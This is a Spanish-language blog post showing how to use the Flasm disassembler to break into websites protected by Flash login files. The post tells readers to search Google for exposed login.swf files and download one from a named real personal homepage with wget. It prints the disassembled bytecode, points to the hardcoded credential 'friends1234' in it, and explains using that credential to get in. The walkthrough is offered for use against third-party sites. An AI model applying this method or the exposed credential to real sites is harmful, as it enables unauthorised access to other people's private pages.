miércoles, 13 de junio de 2012

Hacking Website Using Flasm



Flasm es un ensamblador/desensamblador de código de bytes de ActionScript para Flash. Usando Flasm, autores de scripts pueden aprender actionscript compilador y Flash Player.

Flasm desmonta el SWF completo, incluyendo todas las líneas de tiempo y eventos. En cuanto a desmontaje, a aprender cómo funciona el compilador de Flash, lo que mejora sus habilidades de ActionScript. Usted también puede hacer algunas optimizaciones en el código desmontados a mano o ajustar el código que desee. Flasm a continuación, aplica los cambios en el SWF original, en sustitución de las acciones originales. También es posible integrar las acciones Flasm en el código ActionScript.


Ubicacion:
Aplicaciones - Backtrack - Reverse-Engineering - Flasm

Abriendo desde la Terminal:
root@TioSam:~# cd /pentest/reverse-engineering/flasm
root@TioSam:/pentest/reverse-engineering/flasm# ls
CHANGES.TXT  classic.css  flasm  flasm.html  flasm.ini  LICENSE.TXT  logo.gif
root@TioSam:/pentest/reverse-engineering/flasm# ./flasm


Bypasseando login.html:

Nos dirigimos a Google, en el buscador colocamos login.swf entramos a alguna web que tenga el modulo login.html, copiamos toda la url y descargamos dicho login de la siguiente manera:

root@TioSam:~# wget http://homepage.ntlworld.com/michael.lepki/gallery/login.swf

Ojo: Cuando descarguemos el login.html, cambiemos la extensión a login.swf

Como vemos en la imagen, el login.swf se descargo perfectamente y se ha guardado en nuestra carpeta personal (root)

Ahora bien, para desamblar el login.swf tecleamos el siguiente comando:
root@TioSam:/pentest/reverse-engineering/flasm# ./flasm -d /root/login.swf
movie '/root/login.swf' // flash 5, total frames: 3, frame rate: 10 fps, 151x130 px
  
  protect

  defineButton 20

    on overUpToOverDown
      push 'V'
      push '0'
      push '1'
      push 'String'
      new
      setVariable
      push 'z'
      push ''
      push '1'
      push 'String'
      new
      setVariable
      push 'z'
      push 'userBox'
      getVariable
      push 'passBox'
      getVariable
      concat
      setVariable
      push 'z'
      getVariable
      push 'friends1234'
      stringEq
      not
      branchIfTrue label1
      push 'V'
      push '1'
      setVariable
      getURL 'http://homepage.ntlworld.com/michael.lepki/gallery/start.html' '_s

El login.swf se desamblo perfectamente.

Pero donde esta el usuario con la que entraremos al login?

El usuario se encuentra en push ,en este caso es 'friends1234' ahora con eso podemos dirigirnos a la web y lo colocaremos en "username" y así podremos ingresar a la web sin necesidad se colocar el password.

Increíble no? pues, si no entendistes, dejare una breve demostracion en el siguiente video:

Descargar Tool:

Saludos.



1 comentario:

  1. Me gusta lo que cuentas, pero esto no he podido hacerlo.

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